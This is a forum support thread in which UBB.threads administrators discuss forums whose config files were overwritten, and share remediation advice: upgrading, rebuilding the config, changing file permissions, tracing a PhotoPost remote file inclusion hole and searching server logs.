Previous Thread
Next Thread
Print Thread
Hop To
Joined: Jun 2006
Posts: 626
Addict
Addict
Joined: Jun 2006
Posts: 626
My config.inc.php file was hacked. Will an upgrade from 6.5.2 to 6.5.5 resolve this problem by reconfiguring this file for me?

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
Upgrading to 6.5.5 will close the security issues associated with the older versions however, your config file will probably need to be redone.

The easiest way to rebuild a good config is to go through the install process up to the point where it says the next step is to create the tables. You just stop at that point, since the tables already exist, and you should be good.

You probably will want to check and see if they've done any more than that however. It's possible they've put in some backdoors as well.

Joined: Jun 2006
Posts: 626
Addict
Addict
Joined: Jun 2006
Posts: 626
Thank you.

I will do the upgrade and do as you said re config file.

Joined: Jun 2006
Posts: 626
Addict
Addict
Joined: Jun 2006
Posts: 626
As far as the backdoors goes, it seems they have been hacking a lot of forums lately, and from the information I received from a forum administrator of one of those forums, the only thing hacked was the global config file, therefore, I am not anticipating any other problems, and I do stress not anticipating.

Joined: Jun 2006
Posts: 626
Addict
Addict
Joined: Jun 2006
Posts: 626
The upgrade worked as I am up and running once again, however, even after the upgrade from 6.5.2 to 6.5.5 the Group Management link still doesn't work, therefore, there must be a database problem with that one somewhere. Anyway, I am hoping version 7 will solve that problem.

Joined: Jun 2006
Posts: 626
Addict
Addict
Joined: Jun 2006
Posts: 626
What would happen if I changed the config.inc.php file permissions to 444?

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
You wouldn't be able to modify any config settings from the control panel. The forum would continue to operate fine, but anytime you want to make a change in the control panel you'd need to change the permissions on the config file.

Joined: Jun 2006
Posts: 742
enthusiast
enthusiast
Joined: Jun 2006
Posts: 742
I had 4 clients that had their config file hacked yesterday (different servers and hosts) and all had the previously posted security fixes applied.

This file is kind of vunerable as it needs to be writable so that you can update the settings, but it's odd that someone was hacking threads sites yesterday. Gave me flashbacks from a few months ago.


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Jun 2006
Posts: 742
enthusiast
enthusiast
Joined: Jun 2006
Posts: 742
Also, just FYI for people following along. The default location for the config.inc.php file in Threads is inside the /includes directory, but it is possible to locate this file above web root which is more secure. You do this by adding a path to your config file in the /includes/main.inc.php file.

For example, by default (if you are on a Cpanel server) your config file might be at:

/home/youruser/public_html/ubbthreads/includes/config.inc.php

You could move it here:
/home/youruser/config.inc.php (above the public_html directory) then insert that path into the main.inc.php for the $configdir variable.


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
UBB.threads Developer
Joined: Jun 2006
Posts: 16,292
Likes: 116
Is there any suspicious activity in your clients weblogs Josh?


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
We still get regular attempts at hacking here (I log every attempt at any non-standard URL accessed on this domain). So more than likely their entry point would be in the log file. I just wored on one yesterday that was believed to be a .threads exploit, since the config file was hacked, but it turned out to be a hole in another script entirely that they used to overwrite the threads config file.

Joined: Jun 2006
Posts: 742
enthusiast
enthusiast
Joined: Jun 2006
Posts: 742
No suspicous activity that I could find via the URL (ie I was looking for URLs which had the config file in the URL for manipulation etc....)

I'm actually up to 7 hacked threads boards since the weekend. Usually just the config file is messed with, so it's pretty simple to fix. But annoying. <img src="https://www.ubbcentral.com/boards/images/graemlins/tongue.gif" alt="" />


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
UBB.threads Developer
Joined: Jun 2006
Posts: 16,292
Likes: 116
For giggles, try just searching the weblogs for "http", when I was working for the webhost I had to regularly bugcheck hacked sites :sigh: it cna get pretty simple to hunt down if you know what strings to fiddle with lol


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Jun 2006
Posts: 742
enthusiast
enthusiast
Joined: Jun 2006
Posts: 742
I'll do that. Had 4 more hacked sites today. Either threads or photopost might be at fault here. That seems to be the common denominator with the sites/servers I'm finding. Either they replace the config files, or in a few cases users had writable index files, and those were replaced. Pretty easy to fix, but still annoying.


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Jun 2006
Posts: 742
enthusiast
enthusiast
Joined: Jun 2006
Posts: 742
I discoverd the source, and it was older versions of photopost that were installed on a variety of boxes, a remote file inclusion exploit with the zipndownload.php script. If you're running photopost 4.6 or earlier, delete that file. <img src="https://www.ubbcentral.com/boards/images/graemlins/tongue.gif" alt="" />


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
UBB.threads Developer
Joined: Jun 2006
Posts: 16,292
Likes: 116
At least it was what I figured (being a remote file inclusion), I'm glad you got it worked out <img src="https://www.ubbcentral.com/boards/images/graemlins/smile.gif" alt="" />


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Apr 2006
Posts: 44
T
newbie
newbie
T Offline
Joined: Apr 2006
Posts: 44
[]I discoverd the source, and it was older versions of photopost that were installed on a variety of boxes, a remote file inclusion exploit with the zipndownload.php script. If you're running photopost 4.6 or earlier, delete that file. <img src="https://www.ubbcentral.com/boards/images/graemlins/tongue.gif" alt="" /> [/]What is photopost? Nothing to do with UBB, but something that resides on the server, I presume? We were just hacked and I'd like to let your web host know about this.

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
Photopost is a image gallery script. 6.5.5 has everything known patched up, but you should be able to find out for sure by going through your server access logs and looking for anything suspicious around the time of the hack.

Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
UBB.threads Developer
Joined: Jun 2006
Posts: 16,292
Likes: 116
I'd recommend searching for "http" in yoru error or access logs, it'd show remote script exploits :/


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!

Link Copied to Clipboard
ShoutChat
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
spam issues
by ECNet - 03/19/2024 11:45 PM
Looking for a forum
by azr - 03/15/2024 11:26 PM
Editing Links in Post
by Outdoorking - 03/15/2024 9:31 AM
Question on barkrowler and the like
by Mors - 02/29/2024 6:51 PM
Member Permissions Help
by domspeak - 02/27/2024 6:31 PM
Who's Online Now
1 members (Havenofsobriety), 522 guests, and 99 robots.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Los Angeles
Los Angeles
by isaac, August 6
3D Creations
3D Creations
by JAISP, December 30
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 8.0.0
(Preview build 20230217)